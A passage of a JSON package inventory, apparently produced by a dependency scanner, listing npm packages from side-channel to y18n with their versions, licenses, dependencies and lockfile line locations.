"indirect", "Locations": [ { "StartLine": 8937, "EndLine": 8945 } ], "AnalyzedBy": "npm" }, { "ID": "side-channel@1.1.0", "Name": "side-channel", "Identifier": { "PURL": "pkg:npm/side-channel@1.1.0", "UID": "7e83553b58e9cd60" }, "Version": "1.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-errors@1.3.0", "object-inspect@1.13.4", "side-channel-list@1.0.1", "side-channel-map@1.0.1", "side-channel-weakmap@1.0.2" ], "Locations": [ { "StartLine": 8946, "EndLine": 8964 } ], "AnalyzedBy": "npm" }, { "ID": "side-channel-list@1.0.1", "Name": "side-channel-list", "Identifier": { "PURL": "pkg:npm/side-channel-list@1.0.1", "UID": "35cfde0efedb46b4" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-errors@1.3.0", "object-inspect@1.13.4" ], "Locations": [ { "StartLine": 8965, "EndLine": 8980 } ], "AnalyzedBy": "npm" }, { "ID": "side-channel-map@1.0.1", "Name": "side-channel-map", "Identifier": { "PURL": "pkg:npm/side-channel-map@1.0.1", "UID": "81733fe0f469f610" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bound@1.0.4", "es-errors@1.3.0", "get-intrinsic@1.3.0", "object-inspect@1.13.4" ], "Locations": [ { "StartLine": 8981, "EndLine": 8998 } ], "AnalyzedBy": "npm" }, { "ID": "side-channel-weakmap@1.0.2", "Name": "side-channel-weakmap", "Identifier": { "PURL": "pkg:npm/side-channel-weakmap@1.0.2", "UID": "f2f3f805d82ecb17" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bound@1.0.4", "es-errors@1.3.0", "get-intrinsic@1.3.0", "object-inspect@1.13.4", "side-channel-map@1.0.1" ], "Locations": [ { "StartLine": 8999, "EndLine": 9017 } ], "AnalyzedBy": "npm" }, { "ID": "signal-exit@4.1.0", "Name": "signal-exit", "Identifier": { "PURL": "pkg:npm/signal-exit@4.1.0", "UID": "9987983731dab0d8" }, "Version": "4.1.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9025, "EndLine": 9036 } ], "AnalyzedBy": "npm" }, { "ID": "simple-swizzle@0.2.4", "Name": "simple-swizzle", "Identifier": { "PURL": "pkg:npm/simple-swizzle@0.2.4", "UID": "482cb7e2cb5f5846" }, "Version": "0.2.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-arrayish@0.3.4" ], "Locations": [ { "StartLine": 9037, "EndLine": 9045 } ], "AnalyzedBy": "npm" }, { "ID": "socket.io@4.8.3", "Name": "socket.io", "Identifier": { "PURL": "pkg:npm/socket.io@4.8.3", "UID": "80b4cdedb9e7766f" }, "Version": "4.8.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "accepts@1.3.8", "base64id@2.0.0", "cors@2.8.6", "debug@4.4.3", "engine.io@6.6.7", "socket.io-adapter@2.5.6", "socket.io-parser@4.2.6" ], "Locations": [ { "StartLine": 9046, "EndLine": 9063 } ], "AnalyzedBy": "npm" }, { "ID": "socket.io-adapter@2.5.6", "Name": "socket.io-adapter", "Identifier": { "PURL": "pkg:npm/socket.io-adapter@2.5.6", "UID": "3844a4bb3b9715d8" }, "Version": "2.5.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "debug@4.4.3", "ws@8.18.3" ], "Locations": [ { "StartLine": 9064, "EndLine": 9073 } ], "AnalyzedBy": "npm" }, { "ID": "socket.io-client@4.8.3", "Name": "socket.io-client", "Identifier": { "PURL": "pkg:npm/socket.io-client@4.8.3", "UID": "d3fec6c38ccacc58" }, "Version": "4.8.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@socket.io/component-emitter@3.1.2", "debug@4.4.3", "engine.io-client@6.6.4", "socket.io-parser@4.2.6" ], "Locations": [ { "StartLine": 9074, "EndLine": 9088 } ], "AnalyzedBy": "npm" }, { "ID": "socket.io-parser@4.2.6", "Name": "socket.io-parser", "Identifier": { "PURL": "pkg:npm/socket.io-parser@4.2.6", "UID": "fd9bc0ec05ffa9e0" }, "Version": "4.2.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@socket.io/component-emitter@3.1.2", "debug@4.4.3" ], "Locations": [ { "StartLine": 9089, "EndLine": 9101 } ], "AnalyzedBy": "npm" }, { "ID": "source-map-js@1.2.1", "Name": "source-map-js", "Identifier": { "PURL": "pkg:npm/source-map-js@1.2.1", "UID": "6b703d9c8862f921" }, "Version": "1.2.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9112, "EndLine": 9120 } ], "AnalyzedBy": "npm" }, { "ID": "standard-as-callback@2.1.0", "Name": "standard-as-callback", "Identifier": { "PURL": "pkg:npm/standard-as-callback@2.1.0", "UID": "a7ea42315c7bec2" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9139, "EndLine": 9144 } ], "AnalyzedBy": "npm" }, { "ID": "statuses@2.0.2", "Name": "statuses", "Identifier": { "PURL": "pkg:npm/statuses@2.0.2", "UID": "738967afa781963a" }, "Version": "2.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9145, "EndLine": 9153 } ], "AnalyzedBy": "npm" }, { "ID": "stream-events@1.0.5", "Name": "stream-events", "Identifier": { "PURL": "pkg:npm/stream-events@1.0.5", "UID": "3a3425ed8fa0c6bc" }, "Version": "1.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "stubs@3.0.0" ], "Locations": [ { "StartLine": 9161, "EndLine": 9170 } ], "AnalyzedBy": "npm" }, { "ID": "stream-shift@1.0.3", "Name": "stream-shift", "Identifier": { "PURL": "pkg:npm/stream-shift@1.0.3", "UID": "90944ee34a30f780" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9171, "EndLine": 9177 } ], "AnalyzedBy": "npm" }, { "ID": "streamsearch@1.1.0", "Name": "streamsearch", "Identifier": { "PURL": "pkg:npm/streamsearch@1.1.0", "UID": "eaa108b0e8e5af51" }, "Version": "1.1.0", "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9178, "EndLine": 9185 } ], "AnalyzedBy": "npm" }, { "ID": "string-width@4.2.3", "Name": "string-width", "Identifier": { "PURL": "pkg:npm/string-width@4.2.3", "UID": "7ac7f3d74734ab72" }, "Version": "4.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "emoji-regex@8.0.0", "is-fullwidth-code-point@3.0.0", "strip-ansi@6.0.1" ], "Locations": [ { "StartLine": 9195, "EndLine": 9208 }, { "StartLine": 9209, "EndLine": 9223 } ], "AnalyzedBy": "npm" }, { "ID": "string-width@5.1.2", "Name": "string-width", "Identifier": { "PURL": "pkg:npm/string-width@5.1.2", "UID": "9eed3a2819296bb" }, "Version": "5.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "eastasianwidth@0.2.0", "emoji-regex@9.2.2", "strip-ansi@7.2.0" ], "Locations": [ { "StartLine": 1465, "EndLine": 1481 } ], "AnalyzedBy": "npm" }, { "ID": "string_decoder@1.1.1", "Name": "string_decoder", "Identifier": { "PURL": "pkg:npm/string_decoder@1.1.1", "UID": "d8306eb1610e827c" }, "Version": "1.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "safe-buffer@5.1.2" ], "Locations": [ { "StartLine": 4158, "EndLine": 4166 } ], "AnalyzedBy": "npm" }, { "ID": "string_decoder@1.3.0", "Name": "string_decoder", "Identifier": { "PURL": "pkg:npm/string_decoder@1.3.0", "UID": "71749bade2a0a7b2" }, "Version": "1.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "safe-buffer@5.2.1" ], "Locations": [ { "StartLine": 9186, "EndLine": 9194 } ], "AnalyzedBy": "npm" }, { "ID": "strip-ansi@6.0.1", "Name": "strip-ansi", "Identifier": { "PURL": "pkg:npm/strip-ansi@6.0.1", "UID": "679f2afacaaa74a5" }, "Version": "6.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-regex@5.0.1" ], "Locations": [ { "StartLine": 9236, "EndLine": 9247 }, { "StartLine": 9248, "EndLine": 9260 } ], "AnalyzedBy": "npm" }, { "ID": "strip-ansi@7.2.0", "Name": "strip-ansi", "Identifier": { "PURL": "pkg:npm/strip-ansi@7.2.0", "UID": "ea10cde9417af1c7" }, "Version": "7.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-regex@6.2.2" ], "Locations": [ { "StartLine": 1482, "EndLine": 1496 } ], "AnalyzedBy": "npm" }, { "ID": "strnum@2.2.3", "Name": "strnum", "Identifier": { "PURL": "pkg:npm/strnum@2.2.3", "UID": "77a34942036797f" }, "Version": "2.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9317, "EndLine": 9329 } ], "AnalyzedBy": "npm" }, { "ID": "stubs@3.0.0", "Name": "stubs", "Identifier": { "PURL": "pkg:npm/stubs@3.0.0", "UID": "296b9443626805f1" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9330, "EndLine": 9336 } ], "AnalyzedBy": "npm" }, { "ID": "styled-jsx@5.1.1", "Name": "styled-jsx", "Identifier": { "PURL": "pkg:npm/styled-jsx@5.1.1", "UID": "67dd3be4fccbb5af" }, "Version": "5.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "client-only@0.0.1", "react@18.3.1" ], "Locations": [ { "StartLine": 9337, "EndLine": 9359 } ], "AnalyzedBy": "npm" }, { "ID": "sucrase@3.35.1", "Name": "sucrase", "Identifier": { "PURL": "pkg:npm/sucrase@3.35.1", "UID": "70d825c8742a0c59" }, "Version": "3.35.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@jridgewell/gen-mapping@0.3.13", "commander@4.1.1", "lines-and-columns@1.2.4", "mz@2.7.0", "pirates@4.0.7", "tinyglobby@0.2.16", "ts-interface-checker@0.1.13" ], "Locations": [ { "StartLine": 9360, "EndLine": 9381 } ], "AnalyzedBy": "npm" }, { "ID": "supports-preserve-symlinks-flag@1.0.0", "Name": "supports-preserve-symlinks-flag", "Identifier": { "PURL": "pkg:npm/supports-preserve-symlinks-flag@1.0.0", "UID": "95b841fd7cc1fffe" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9480, "EndLine": 9491 } ], "AnalyzedBy": "npm" }, { "ID": "svg-arc-to-cubic-bezier@3.2.0", "Name": "svg-arc-to-cubic-bezier", "Identifier": { "PURL": "pkg:npm/svg-arc-to-cubic-bezier@3.2.0", "UID": "6e042538093944d9" }, "Version": "3.2.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9492, "EndLine": 9497 } ], "AnalyzedBy": "npm" }, { "ID": "tailwindcss@3.4.19", "Name": "tailwindcss", "Identifier": { "PURL": "pkg:npm/tailwindcss@3.4.19", "UID": "492f52845e062ad7" }, "Version": "3.4.19", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@alloc/quick-lru@5.2.0", "arg@5.0.2", "chokidar@3.6.0", "didyoumean@1.2.2", "dlv@1.1.3", "fast-glob@3.3.3", "glob-parent@6.0.2", "is-glob@4.0.3", "jiti@1.21.7", "lilconfig@3.1.3", "micromatch@4.0.8", "normalize-path@3.0.0", "object-hash@3.0.0", "picocolors@1.1.1", "postcss-import@15.1.0", "postcss-js@4.1.0", "postcss-load-config@6.0.1", "postcss-nested@6.2.0", "postcss-selector-parser@6.1.2", "postcss@8.5.12", "resolve@1.22.12", "sucrase@3.35.1" ], "Locations": [ { "StartLine": 9498, "EndLine": 9534 } ], "AnalyzedBy": "npm" }, { "ID": "teeny-request@9.0.0", "Name": "teeny-request", "Identifier": { "PURL": "pkg:npm/teeny-request@9.0.0", "UID": "1b0bf4d2a4776d91" }, "Version": "9.0.0", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "http-proxy-agent@5.0.0", "https-proxy-agent@5.0.1", "node-fetch@2.7.0", "stream-events@1.0.5", "uuid@9.0.1" ], "Locations": [ { "StartLine": 9535, "EndLine": 9551 } ], "AnalyzedBy": "npm" }, { "ID": "thenify@3.3.1", "Name": "thenify", "Identifier": { "PURL": "pkg:npm/thenify@3.3.1", "UID": "1f012dc5fe116c3e" }, "Version": "3.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "any-promise@1.3.0" ], "Locations": [ { "StartLine": 9601, "EndLine": 9609 } ], "AnalyzedBy": "npm" }, { "ID": "thenify-all@1.6.0", "Name": "thenify-all", "Identifier": { "PURL": "pkg:npm/thenify-all@1.6.0", "UID": "b61fcb84a1ede03b" }, "Version": "1.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "thenify@3.3.1" ], "Locations": [ { "StartLine": 9610, "EndLine": 9621 } ], "AnalyzedBy": "npm" }, { "ID": "thirty-two@1.0.2", "Name": "thirty-two", "Identifier": { "PURL": "pkg:npm/thirty-two@1.0.2", "UID": "ab61c26779f06bd3" }, "Version": "1.0.2", "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9622, "EndLine": 9629 } ], "AnalyzedBy": "npm" }, { "ID": "tiny-inflate@1.0.3", "Name": "tiny-inflate", "Identifier": { "PURL": "pkg:npm/tiny-inflate@1.0.3", "UID": "74c950df4484b3fa" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9630, "EndLine": 9635 } ], "AnalyzedBy": "npm" }, { "ID": "tiny-invariant@1.3.3", "Name": "tiny-invariant", "Identifier": { "PURL": "pkg:npm/tiny-invariant@1.3.3", "UID": "5aead8c9965b5d43" }, "Version": "1.3.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9636, "EndLine": 9641 } ], "AnalyzedBy": "npm" }, { "ID": "tinyglobby@0.2.16", "Name": "tinyglobby", "Identifier": { "PURL": "pkg:npm/tinyglobby@0.2.16", "UID": "ceea37b0a7812d4" }, "Version": "0.2.16", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "fdir@6.5.0", "picomatch@4.0.4" ], "Locations": [ { "StartLine": 9649, "EndLine": 9664 } ], "AnalyzedBy": "npm" }, { "ID": "to-regex-range@5.0.1", "Name": "to-regex-range", "Identifier": { "PURL": "pkg:npm/to-regex-range@5.0.1", "UID": "a26acf74aae52d11" }, "Version": "5.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "is-number@7.0.0" ], "Locations": [ { "StartLine": 9714, "EndLine": 9725 } ], "AnalyzedBy": "npm" }, { "ID": "toidentifier@1.0.1", "Name": "toidentifier", "Identifier": { "PURL": "pkg:npm/toidentifier@1.0.1", "UID": "6d0d33c566903937" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9726, "EndLine": 9734 } ], "AnalyzedBy": "npm" }, { "ID": "tr46@0.0.3", "Name": "tr46", "Identifier": { "PURL": "pkg:npm/tr46@0.0.3", "UID": "475e4fc5c9feb30" }, "Version": "0.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9735, "EndLine": 9740 } ], "AnalyzedBy": "npm" }, { "ID": "ts-interface-checker@0.1.13", "Name": "ts-interface-checker", "Identifier": { "PURL": "pkg:npm/ts-interface-checker@0.1.13", "UID": "f9f1955d2979f27b" }, "Version": "0.1.13", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9751, "EndLine": 9756 } ], "AnalyzedBy": "npm" }, { "ID": "tslib@2.4.1", "Name": "tslib", "Identifier": { "PURL": "pkg:npm/tslib@2.4.1", "UID": "1258c0e23455373" }, "Version": "2.4.1", "Licenses": [ "0BSD" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9893, "EndLine": 9898 } ], "AnalyzedBy": "npm" }, { "ID": "tslib@2.8.1", "Name": "tslib", "Identifier": { "PURL": "pkg:npm/tslib@2.8.1", "UID": "d1457c8f212a3c9b" }, "Version": "2.8.1", "Licenses": [ "0BSD" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2736, "EndLine": 2741 } ], "AnalyzedBy": "npm" }, { "ID": "twilio@5.13.1", "Name": "twilio", "Identifier": { "PURL": "pkg:npm/twilio@5.13.1", "UID": "1313c288fc26a5fd" }, "Version": "5.13.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "axios@1.15.2", "dayjs@1.11.20", "https-proxy-agent@5.0.1", "jsonwebtoken@9.0.3", "qs@6.14.2", "scmp@2.1.0", "xmlbuilder@13.0.2" ], "Locations": [ { "StartLine": 10001, "EndLine": 10018 } ], "AnalyzedBy": "npm" }, { "ID": "type-is@1.6.18", "Name": "type-is", "Identifier": { "PURL": "pkg:npm/type-is@1.6.18", "UID": "60ecb3bacb70bc1a" }, "Version": "1.6.18", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "media-typer@0.3.0", "mime-types@2.1.35" ], "Locations": [ { "StartLine": 10080, "EndLine": 10092 } ], "AnalyzedBy": "npm" }, { "ID": "typedarray@0.0.6", "Name": "typedarray", "Identifier": { "PURL": "pkg:npm/typedarray@0.0.6", "UID": "e37857a0e28e3dd0" }, "Version": "0.0.6", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10093, "EndLine": 10098 } ], "AnalyzedBy": "npm" }, { "ID": "undici-types@6.21.0", "Name": "undici-types", "Identifier": { "PURL": "pkg:npm/undici-types@6.21.0", "UID": "67a6036fc7b5abcf" }, "Version": "6.21.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10120, "EndLine": 10125 } ], "AnalyzedBy": "npm" }, { "ID": "unicode-properties@1.4.1", "Name": "unicode-properties", "Identifier": { "PURL": "pkg:npm/unicode-properties@1.4.1", "UID": "4ccff6046bd0f674" }, "Version": "1.4.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "base64-js@1.5.1", "unicode-trie@2.0.0" ], "Locations": [ { "StartLine": 10126, "EndLine": 10135 } ], "AnalyzedBy": "npm" }, { "ID": "unicode-trie@2.0.0", "Name": "unicode-trie", "Identifier": { "PURL": "pkg:npm/unicode-trie@2.0.0", "UID": "3f212f2d10be47f2" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "pako@0.2.9", "tiny-inflate@1.0.3" ], "Locations": [ { "StartLine": 10136, "EndLine": 10145 } ], "AnalyzedBy": "npm" }, { "ID": "unpipe@1.0.0", "Name": "unpipe", "Identifier": { "PURL": "pkg:npm/unpipe@1.0.0", "UID": "c67f500119cb9f3" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10152, "EndLine": 10160 } ], "AnalyzedBy": "npm" }, { "ID": "update-browserslist-db@1.2.3", "Name": "update-browserslist-db", "Identifier": { "PURL": "pkg:npm/update-browserslist-db@1.2.3", "UID": "19a4780ba2278215" }, "Version": "1.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "browserslist@4.28.2", "escalade@3.2.0", "picocolors@1.1.1" ], "Locations": [ { "StartLine": 10161, "EndLine": 10190 } ], "AnalyzedBy": "npm" }, { "ID": "util-deprecate@1.0.2", "Name": "util-deprecate", "Identifier": { "PURL": "pkg:npm/util-deprecate@1.0.2", "UID": "235bfe23ae290480" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10201, "EndLine": 10206 } ], "AnalyzedBy": "npm" }, { "ID": "utils-merge@1.0.1", "Name": "utils-merge", "Identifier": { "PURL": "pkg:npm/utils-merge@1.0.1", "UID": "b916ae5e87e8a7ae" }, "Version": "1.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10207, "EndLine": 10215 } ], "AnalyzedBy": "npm" }, { "ID": "uuid@10.0.0", "Name": "uuid", "Identifier": { "PURL": "pkg:npm/uuid@10.0.0", "UID": "1ddd00c8cdc7fbea" }, "Version": "10.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10216, "EndLine": 10229 } ], "AnalyzedBy": "npm" }, { "ID": "uuid@8.3.2", "Name": "uuid", "Identifier": { "PURL": "pkg:npm/uuid@8.3.2", "UID": "831014183778cf43" }, "Version": "8.3.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 846, "EndLine": 856 }, { "StartLine": 7331, "EndLine": 7340 } ], "AnalyzedBy": "npm" }, { "ID": "uuid@9.0.1", "Name": "uuid", "Identifier": { "PURL": "pkg:npm/uuid@9.0.1", "UID": "eed601fd93084a2d" }, "Version": "9.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 5738, "EndLine": 5752 }, { "StartLine": 5929, "EndLine": 5943 }, { "StartLine": 9579, "EndLine": 9593 } ], "AnalyzedBy": "npm" }, { "ID": "vary@1.1.2", "Name": "vary", "Identifier": { "PURL": "pkg:npm/vary@1.1.2", "UID": "6de7b341ec76f663" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10237, "EndLine": 10245 } ], "AnalyzedBy": "npm" }, { "ID": "victory-vendor@36.9.2", "Name": "victory-vendor", "Identifier": { "PURL": "pkg:npm/victory-vendor@36.9.2", "UID": "8c41cf750385cd24" }, "Version": "36.9.2", "Licenses": [ "MIT AND ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/d3-array@3.2.2", "@types/d3-ease@3.0.2", "@types/d3-interpolate@3.0.4", "@types/d3-scale@4.0.9", "@types/d3-shape@3.1.8", "@types/d3-time@3.0.4", "@types/d3-timer@3.0.2", "d3-array@3.2.4", "d3-ease@3.0.1", "d3-interpolate@3.0.1", "d3-scale@4.0.2", "d3-shape@3.2.0", "d3-time@3.1.0", "d3-timer@3.0.1" ], "Locations": [ { "StartLine": 10246, "EndLine": 10267 } ], "AnalyzedBy": "npm" }, { "ID": "vite-compatible-readable-stream@3.6.1", "Name": "vite-compatible-readable-stream", "Identifier": { "PURL": "pkg:npm/vite-compatible-readable-stream@3.6.1", "UID": "e454880bf1caca50" }, "Version": "3.6.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "inherits@2.0.4", "string_decoder@1.3.0", "util-deprecate@1.0.2" ], "Locations": [ { "StartLine": 10328, "EndLine": 10341 } ], "AnalyzedBy": "npm" }, { "ID": "webidl-conversions@3.0.1", "Name": "webidl-conversions", "Identifier": { "PURL": "pkg:npm/webidl-conversions@3.0.1", "UID": "d884f1e793f9faff" }, "Version": "3.0.1", "Licenses": [ "BSD-2-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10431, "EndLine": 10436 } ], "AnalyzedBy": "npm" }, { "ID": "websocket-driver@0.7.4", "Name": "websocket-driver", "Identifier": { "PURL": "pkg:npm/websocket-driver@0.7.4", "UID": "bb3a9d7698310cc2" }, "Version": "0.7.4", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "http-parser-js@0.5.10", "safe-buffer@5.2.1", "websocket-extensions@0.1.4" ], "Locations": [ { "StartLine": 10437, "EndLine": 10450 } ], "AnalyzedBy": "npm" }, { "ID": "websocket-extensions@0.1.4", "Name": "websocket-extensions", "Identifier": { "PURL": "pkg:npm/websocket-extensions@0.1.4", "UID": "2fb21839a861a15b" }, "Version": "0.1.4", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10451, "EndLine": 10459 } ], "AnalyzedBy": "npm" }, { "ID": "whatwg-url@5.0.0", "Name": "whatwg-url", "Identifier": { "PURL": "pkg:npm/whatwg-url@5.0.0", "UID": "125906d114aa04c4" }, "Version": "5.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "tr46@0.0.3", "webidl-conversions@3.0.1" ], "Locations": [ { "StartLine": 10460, "EndLine": 10469 } ], "AnalyzedBy": "npm" }, { "ID": "which@2.0.2", "Name": "which", "Identifier": { "PURL": "pkg:npm/which@2.0.2", "UID": "bd944a1b8e2e3803" }, "Version": "2.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "isexe@2.0.0" ], "Locations": [ { "StartLine": 10470, "EndLine": 10484 } ], "AnalyzedBy": "npm" }, { "ID": "which-module@2.0.1", "Name": "which-module", "Identifier": { "PURL": "pkg:npm/which-module@2.0.1", "UID": "e3353609be4de2d6" }, "Version": "2.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10485, "EndLine": 10490 } ], "AnalyzedBy": "npm" }, { "ID": "wrap-ansi@6.2.0", "Name": "wrap-ansi", "Identifier": { "PURL": "pkg:npm/wrap-ansi@6.2.0", "UID": "a32f9d6e25e3b027" }, "Version": "6.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-styles@4.3.0", "string-width@4.2.3", "strip-ansi@6.0.1" ], "Locations": [ { "StartLine": 8233, "EndLine": 8246 } ], "AnalyzedBy": "npm" }, { "ID": "wrap-ansi@7.0.0", "Name": "wrap-ansi", "Identifier": { "PURL": "pkg:npm/wrap-ansi@7.0.0", "UID": "8bee6fdcb9058cee" }, "Version": "7.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-styles@4.3.0", "string-width@4.2.3", "strip-ansi@6.0.1" ], "Locations": [ { "StartLine": 10518, "EndLine": 10535 }, { "StartLine": 10536, "EndLine": 10553 } ], "AnalyzedBy": "npm" }, { "ID": "wrap-ansi@8.1.0", "Name": "wrap-ansi", "Identifier": { "PURL": "pkg:npm/wrap-ansi@8.1.0", "UID": "f65553ce27261dcd" }, "Version": "8.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ansi-styles@6.2.3", "string-width@5.1.2", "strip-ansi@7.2.0" ], "Locations": [ { "StartLine": 1497, "EndLine": 1513 } ], "AnalyzedBy": "npm" }, { "ID": "wrappy@1.0.2", "Name": "wrappy", "Identifier": { "PURL": "pkg:npm/wrappy@1.0.2", "UID": "798a66a5ecf49027" }, "Version": "1.0.2", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10554, "EndLine": 10560 } ], "AnalyzedBy": "npm" }, { "ID": "ws@8.18.3", "Name": "ws", "Identifier": { "PURL": "pkg:npm/ws@8.18.3", "UID": "f8dc386179443300" }, "Version": "8.18.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10561, "EndLine": 10581 } ], "AnalyzedBy": "npm" }, { "ID": "xmlbuilder@13.0.2", "Name": "xmlbuilder", "Identifier": { "PURL": "pkg:npm/xmlbuilder@13.0.2", "UID": "fcded8a61f796d2d" }, "Version": "13.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10582, "EndLine": 10590 } ], "AnalyzedBy": "npm" }, { "ID": "xmlhttprequest-ssl@2.1.2", "Name": "xmlhttprequest-ssl", "Identifier": { "PURL": "pkg:npm/xmlhttprequest-ssl@2.1.2", "UID": "ee30c9dc7641a72" }, "Version": "2.1.2", "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10591, "EndLine": 10598 } ], "AnalyzedBy": "npm" }, { "ID": "xtend@4.0.2", "Name": "xtend", "Identifier": { "PURL": "pkg:npm/xtend@4.0.2", "UID": "adaf491d0010f9bd" }, "Version": "4.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 10599, "EndLine": 10607 } ], "AnalyzedBy": "npm" }, { "ID": "y18n@4.0.3", "Name": "y18n", "Identifier": { "PURL": "pkg:npm/y18n@4.0.3", "UID": "35cf4c607c271c7c" }, "Version": "4.0.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 8247, "EndLine": 8252 } ], "AnalyzedBy": "npm" }, { "ID": "y18n@5.0.8", "Name": "y18n", "Identifier": { "PURL": 